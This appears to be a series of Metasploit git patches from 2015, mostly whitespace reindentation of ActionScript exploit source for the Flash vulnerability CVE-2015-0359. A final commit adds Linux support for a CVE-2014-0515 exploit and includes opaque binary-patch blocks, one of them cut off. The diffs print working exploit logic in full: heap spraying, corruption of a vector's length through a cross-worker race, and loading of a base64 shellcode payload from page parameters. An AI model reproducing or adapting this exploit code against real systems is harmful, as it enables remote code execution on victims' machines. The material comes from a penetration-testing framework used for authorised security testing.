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
YDboJn!nWUfe*g{{=u;x!|NU8Xm1pgV%m4rY


From 7202e279186312510473b995f9f51e3de70e4275 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 14:12:26 -0500
Subject: [PATCH 0391/1013] Fix indentation

---
 .../source/exploits/CVE-2015-0359/Exploit.as  | 44 +++++++++----------
 1 file changed, 22 insertions(+), 22 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0359/Exploit.as b/external/source/exploits/CVE-2015-0359/Exploit.as
index 104ae2d7cd..45e811a4a9 100755
--- a/external/source/exploits/CVE-2015-0359/Exploit.as
+++ b/external/source/exploits/CVE-2015-0359/Exploit.as
@@ -31,9 +31,9 @@ package
 		private var b64:Base64Decoder = new Base64Decoder()
 		private var worker:Worker
 		private var mc:MessageChannel
-	    private var payload:ByteArray
-	    private var platform:String
-	    private var os:String
+		private var payload:ByteArray
+		private var platform:String
+		private var os:String
 		private var exploiter:Exploiter
 
 		public function Exploit() 
@@ -44,20 +44,20 @@ package
 
 		private function mainThread():void
 		{
-	        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-	        os = LoaderInfo(this.root.loaderInfo).parameters.os
-	        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-	        var pattern:RegExp = / /g;
-	        b64_payload = b64_payload.replace(pattern, "+")
-	        b64.decode(b64_payload)
-	        payload = b64.toByteArray()
+			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+			os = LoaderInfo(this.root.loaderInfo).parameters.os
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray()
 			
 			ba.length = 0x1000
 			ba.shareable = true
-	        for (var i:uint = 0; i < ov.length; i++) {
-	            ov[i] = new Vector.<uint>(1014)
-	            ov[i][0] = 0xdeedbeef
-	        }
+			for (var i:uint = 0; i < ov.length; i++) {
+				ov[i] = new Vector.<uint>(1014)
+				ov[i][0] = 0xdeedbeef
+			}
 			for (i = 0; i < ov.length; i += 2) delete(ov[i])
 			worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
 			mc = worker.createMessageChannel(Worker.current)
@@ -85,12 +85,12 @@ package
 			mc.send("")
 			while (mc.messageAvailable);
 			
-	        for (i = 0;; i++) {
-	        	if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
+			for (i = 0;; i++) {
+				if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
 					ov[0][i] = 0xffffffff
 					break
-	        	}
-	        }
+				}
+			}
 			ov[0][0xfffffffe] = 1014
 			
 			mc.send("")
@@ -102,8 +102,8 @@ package
 			Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
 			if (mod == 1022) mc.receive()
 	        else {			
-		        for (var i:uint = 0; i < ov.length; i++) {
-		            if (ov[i].length == 0xffffffff) {
+				for (var i:uint = 0; i < ov.length; i++) {
+					if (ov[i].length == 0xffffffff) {
 						uv = ov[i]
 					} else {
 						if (ov[i] != null) {
@@ -111,13 +111,13 @@ package
 							ov[i] = null
 						}
 					}
-		        }
+				}
 				if (uv == null) {
 					Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
 					return
 				}
 				exploiter = new Exploiter(this, platform, os, payload, uv)
-	        }
+			}
 		}
 	}
 }

From 1d05ce1cdc33dd50296836a20c89ea33377636ef Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 14:14:29 -0500
Subject: [PATCH 0392/1013] Fix for indentation

---
 external/source/exploits/CVE-2015-0359/Exploiter.as | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0359/Exploiter.as b/external/source/exploits/CVE-2015-0359/Exploiter.as
index 0a971409f6..f32ba07e13 100644
--- a/external/source/exploits/CVE-2015-0359/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0359/Exploiter.as
@@ -54,11 +54,11 @@ package
             Logger.log("[*] Exploiter - spray_objects()")
             for (var i:uint = 0; i < spray.length; i++) 
             {
-				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
-				spray[i][0] = eba.ba
-				spray[i][1] = exploit 
-				spray[i][2] = stack
-				spray[i][3] = payload_space
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
             } 
         }
         

From 2bb3a5059c62a8fa4498a535165ced277b667e5f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 14:15:58 -0500
Subject: [PATCH 0393/1013] Fix else indentation

---
 .../source/exploits/CVE-2015-0359/Exploit.as  | 28 +++++++++----------
 1 file changed, 14 insertions(+), 14 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0359/Exploit.as b/external/source/exploits/CVE-2015-0359/Exploit.as
index 45e811a4a9..2846daaef7 100755
--- a/external/source/exploits/CVE-2015-0359/Exploit.as
+++ b/external/source/exploits/CVE-2015-0359/Exploit.as
@@ -102,20 +102,20 @@ package
 			Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
 			if (mod == 1022) mc.receive()
 	        else {			
-				for (var i:uint = 0; i < ov.length; i++) {
-					if (ov[i].length == 0xffffffff) {
-						uv = ov[i]
-					} else {
-						if (ov[i] != null) {
-							delete(ov[i])
-							ov[i] = null
-						}
-					}
-				}
-				if (uv == null) {
-					Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
-					return
-				}
+                for (var i:uint = 0; i < ov.length; i++) {
+                    if (ov[i].length == 0xffffffff) {
+                        uv = ov[i]
+                    } else {
+                        if (ov[i] != null) {
+                            delete(ov[i])
+                            ov[i] = null
+                        }
+                    }
+                }
+                if (uv == null) {
+                    Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
+                    return
+                }
 				exploiter = new Exploiter(this, platform, os, payload, uv)
 			}
 		}

From 64562565fb2c84fcada2d71197e98b8d174a038f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 14:16:47 -0500
Subject: [PATCH 0394/1013] Fix method indentation

---
 .../source/exploits/CVE-2015-0359/Exploit.as   | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0359/Exploit.as b/external/source/exploits/CVE-2015-0359/Exploit.as
index 2846daaef7..6460587c8f 100755
--- a/external/source/exploits/CVE-2015-0359/Exploit.as
+++ b/external/source/exploits/CVE-2015-0359/Exploit.as
@@ -96,12 +96,12 @@ package
 			mc.send("")
 		}
 
-		private function onMessage(e:Event):void
-		{
-	        var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
-			Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
-			if (mod == 1022) mc.receive()
-	        else {			
+        private function onMessage(e:Event):void
+        {
+            var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
+            Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
+            if (mod == 1022) mc.receive()
+            else {			
                 for (var i:uint = 0; i < ov.length; i++) {
                     if (ov[i].length == 0xffffffff) {
                         uv = ov[i]
@@ -116,8 +116,8 @@ package
                     Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
                     return
                 }
-				exploiter = new Exploiter(this, platform, os, payload, uv)
-			}
-		}
+                exploiter = new Exploiter(this, platform, os, payload, uv)
+            }
+        }
 	}
 }

From af31112646c6fbc45a0eff7cfd24c76c9fb8b26c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 14:19:36 -0500
Subject: [PATCH 0395/1013] Fix exploit indentation

---
 .../source/exploits/CVE-2015-0359/Exploit.as  | 148 +++++++++---------
 1 file changed, 74 insertions(+), 74 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0359/Exploit.as b/external/source/exploits/CVE-2015-0359/Exploit.as
index 6460587c8f..fe93a4d79b 100755
--- a/external/source/exploits/CVE-2015-0359/Exploit.as
+++ b/external/source/exploits/CVE-2015-0359/Exploit.as
@@ -12,89 +12,89 @@
 
 package
 {
-	import flash.display.Sprite
-	import flash.events.Event
-	import flash.utils.ByteArray
-	import flash.system.Worker
-	import flash.system.WorkerDomain
-	import flash.system.MessageChannel
-	import flash.system.ApplicationDomain
-	import avm2.intrinsics.memory.casi32
-	import flash.display.LoaderInfo
-	import mx.utils.Base64Decoder
+    import flash.display.Sprite
+    import flash.events.Event
+    import flash.utils.ByteArray
+    import flash.system.Worker
+    import flash.system.WorkerDomain
+    import flash.system.MessageChannel
+    import flash.system.ApplicationDomain
+    import avm2.intrinsics.memory.casi32
+    import flash.display.LoaderInfo
+    import mx.utils.Base64Decoder
 
-	public class Exploit extends Sprite 
-	{
-		private var ov:Vector.<Object> = new Vector.<Object>(25600)
-		private var uv:Vector.<uint> = new Vector.<uint>
-		private var ba:ByteArray = new ByteArray()
-		private var b64:Base64Decoder = new Base64Decoder()
-		private var worker:Worker
-		private var mc:MessageChannel
-		private var payload:ByteArray
-		private var platform:String
-		private var os:String
-		private var exploiter:Exploiter
+    public class Exploit extends Sprite 
+    {
+        private var ov:Vector.<Object> = new Vector.<Object>(25600)
+        private var uv:Vector.<uint> = new Vector.<uint>
+        private var ba:ByteArray = new ByteArray()
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var worker:Worker
+        private var mc:MessageChannel
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+        private var exploiter:Exploiter
 
-		public function Exploit() 
-		{
-			if (Worker.current.isPrimordial) mainThread()
-			else workerThread()
-		}
+        public function Exploit() 
+        {
+            if (Worker.current.isPrimordial) mainThread()
+            else workerThread()
+        }
 
-		private function mainThread():void
-		{
-			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-			os = LoaderInfo(this.root.loaderInfo).parameters.os
-			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-			var pattern:RegExp = / /g;
-			b64_payload = b64_payload.replace(pattern, "+")
-			b64.decode(b64_payload)
-			payload = b64.toByteArray()
+        private function mainThread():void
+        {
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
 			
-			ba.length = 0x1000
-			ba.shareable = true
-			for (var i:uint = 0; i < ov.length; i++) {
-				ov[i] = new Vector.<uint>(1014)
-				ov[i][0] = 0xdeedbeef
-			}
-			for (i = 0; i < ov.length; i += 2) delete(ov[i])
-			worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
-			mc = worker.createMessageChannel(Worker.current)
-			mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
-			worker.setSharedProperty("mc", mc)
-			worker.setSharedProperty("ba", ba)
-			ApplicationDomain.currentDomain.domainMemory = ba
-			worker.start()
-		}
+            ba.length = 0x1000
+            ba.shareable = true
+            for (var i:uint = 0; i < ov.length; i++) {
+                ov[i] = new Vector.<uint>(1014)
+                ov[i][0] = 0xdeedbeef
+            }
+            for (i = 0; i < ov.length; i += 2) delete(ov[i])
+            worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
+            mc = worker.createMessageChannel(Worker.current)
+            mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
+            worker.setSharedProperty("mc", mc)
+            worker.setSharedProperty("ba", ba)
+            ApplicationDomain.currentDomain.domainMemory = ba
+            worker.start()
+        }
 
-		private function workerThread():void
-		{
-			var ba:ByteArray = Worker.current.getSharedProperty("ba")
-			var mc:MessageChannel = Worker.current.getSharedProperty("mc")
-			var tmp:ByteArray = new ByteArray()
-			tmp.length = 0x2000
+        private function workerThread():void
+        {
+            var ba:ByteArray = Worker.current.getSharedProperty("ba")
+            var mc:MessageChannel = Worker.current.getSharedProperty("mc")
+            var tmp:ByteArray = new ByteArray()
+            tmp.length = 0x2000
 			
-			for (var i:uint = 0; i < 20; i++) {
-				new Vector.<uint>(1022)
-			}
+            for (var i:uint = 0; i < 20; i++) {
+                new Vector.<uint>(1022)
+            }
 			
-			ba.writeBytes(tmp)
-			ov[0] = new Vector.<uint>(1022)
+            ba.writeBytes(tmp)
+            ov[0] = new Vector.<uint>(1022)
 			
-			mc.send("")
-			while (mc.messageAvailable);
+            mc.send("")
+            while (mc.messageAvailable);
 			
-			for (i = 0;; i++) {
-				if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
-					ov[0][i] = 0xffffffff
-					break
-				}
-			}
-			ov[0][0xfffffffe] = 1014
+            for (i = 0;; i++) {
+                if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
+                    ov[0][i] = 0xffffffff
+                    break
+                }
+            }
+            ov[0][0xfffffffe] = 1014
 			
-			mc.send("")
-		}
+            mc.send("")
+        }
 
         private function onMessage(e:Event):void
         {
@@ -119,5 +119,5 @@ package
                 exploiter = new Exploiter(this, platform, os, payload, uv)
             }
         }
-	}
+    }
 }

From 8ed13b1d1b0ee5da43891c478e584168210c48dc Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 11 Jun 2015 16:18:50 -0500
Subject: [PATCH 0396/1013] Add linux support for CVE-2014-0515

---
 data/exploits/CVE-2014-0515/Graph.swf         | Bin 4943 -> 0 bytes
 data/exploits/CVE-2014-0515/msf.swf           | Bin 0 -> 21561 bytes
 external/source/exploits/CVE-2014-0515/Elf.as | 235 ++++++++++
 .../source/exploits/CVE-2014-0515/Exploit.as  | 140 ++++++
 .../CVE-2014-0515/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2014-0515/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2014-0515/Exploiter.as       | 399 +++++++++++++++++
 .../source/exploits/CVE-2014-0515/Graph.as    | 411 ------------------
 .../exploits/CVE-2014-0515/GraphShadLinux.as  |  10 +
 .../CVE-2014-0515/GraphShadWindows.as         |  10 +
 .../exploits/CVE-2014-0515/Graph_Shad.as      |  10 -
 .../source/exploits/CVE-2014-0515/Logger.as   |  32 ++
 external/source/exploits/CVE-2014-0515/PE.as  |  72 +++
 .../exploits/CVE-2014-0515/binary_data_linux  | Bin 0 -> 2425 bytes
 .../{binary_data => binary_data_windows}      | Bin
 .../browser/adobe_flash_pixel_bender_bof.rb   | 149 +++++++
 .../browser/adobe_flash_pixel_bender_bof.rb   |  50 +--
 17 files changed, 1221 insertions(+), 456 deletions(-)
 delete mode 100755 data/exploits/CVE-2014-0515/Graph.swf
 create mode 100644 data/exploits/CVE-2014-0515/msf.swf
 create mode 100644 external/source/exploits/CVE-2014-0515/Elf.as
 create mode 100755 external/source/exploits/CVE-2014-0515/Exploit.as
 create mode 100644 external/source/exploits/CVE-2014-0515/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2014-0515/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2014-0515/Exploiter.as
 delete mode 100755 external/source/exploits/CVE-2014-0515/Graph.as
 create mode 100755 external/source/exploits/CVE-2014-0515/GraphShadLinux.as
 create mode 100755 external/source/exploits/CVE-2014-0515/GraphShadWindows.as
 delete mode 100755 external/source/exploits/CVE-2014-0515/Graph_Shad.as
 create mode 100755 external/source/exploits/CVE-2014-0515/Logger.as
 create mode 100644 external/source/exploits/CVE-2014-0515/PE.as
 create mode 100755 external/source/exploits/CVE-2014-0515/binary_data_linux
 rename external/source/exploits/CVE-2014-0515/{binary_data => binary_data_windows} (100%)
 create mode 100644 modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb

diff --git a/data/exploits/CVE-2014-0515/Graph.swf b/data/exploits/CVE-2014-0515/Graph.swf
deleted file mode 100755
index aa30c2421e2ed20fe89b98f880289bffe90aae6c..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 4943
zcmV-V6R_+<S5p{;CIA3<0qr_{a9hQlyZheL)0g#SMF}P*iX#W|Axr*BVuv_ZoH&F+
z5@H%C*vRimPqBzB8A<-?Tn7P#Knrbi9B`ED;RMQMYSKV^H*=kq3%LWX*XeYegu*aw
zr=h)@<CxxMf!+<BYw`Vl`y@+B3v<`$P5(hN-hI2jkNth`zI~n{^3MoyJwwO}N_KiL
zBZS=9cqb#|>g_Y*nc$R>FQjwXZ7uC>(U#!$KKs@AWUBYT&cPr+vxQz5ZEG1T7AJZm
zk?HB_w&~8cT>em`y{D%q677g|bc6vTT$s%kwV80Xu%@NY9)zFZvePIe^67~p@Go;q
zCYG2@Oy)C!RWcDVGRC-(Efyl}ZS5^(RIO0O%@*3UWKK8Q61njR03sdH_KxyOVzp$V
zH<ineYsEfoVj`1HXt-u%CR`ZHB@Rz(Q${$I(F$W%N2-WI%nEU`DruiUs-39AET)SY
zqc4Wi1Y-$YW=QB5j8zvF98API+KEX$lP-)I`M$~Q;cRX?D-f%*b;yalp%ruWsFk@o
z#Eh0bG^rgj`gZLV{FcUbSV^sD^j)vb1~+XCg7vygEpf7n2A1sw3s0moMn0I;#*J+)
zbt(>&VJ+3D>1c~$+~||(OmbUGXLnb7XS5|!j)4e<QcVy*aEU31u0Arr78e&?9zyo+
z3-6B&4c)Zwz)o_DU4r<uz@MxhIHW*d{q6L;C0$KkvG2}n6JzAGf7EZn%&~{Gk;W4I
z<hSqs^%0fx#Utv|_n&aQ^xZElSU&&2(bWqd{KJlW9{46#N^`$CqTGMqpQaF7dFk=@
z-&XEIIuK`3dZP5AeCF<ZKPSKZxktVx69)5cT;_wti!nkjta6Dy2oE?Wi>tnXeW^cu
zL5wdf3OHbvd-ArJw`*T|3-Qj(AI2Vj0{_A)yLJJ_KxX3me7>K>W`+iOhj-=@lOiXA
zS~eLRGK$4?_E2FsmK;xK(}iLlV*^GQhJzT|!5!!V@LN~g=3!xy;X*#Kb*p%6(+aAV
zOy-S3!7^nefYfDn@$#%9(EK7v+LGzQL`IwK9h%6ei$<t^a;FL0r{4~I26B-0>8z1o
zRgbhMTQu?-WXF_YB3@n(uVb>(gc(y<0eW{~hj6W!fK0KN^p1EuHq;r9w}IHCaS#G@
ze?C10(Ytr3SBSp4T%xLF0`Q?sL^nk+Ho<t7gF<mBoh{0f&^RE!lJRk4JeQwUrnJnY
z;haW&%TsCsbOTX*CPsWBpDO}`_(U=9Dud#>0Y%5K#xuEumWgjt(%GajW7je`#>!yH
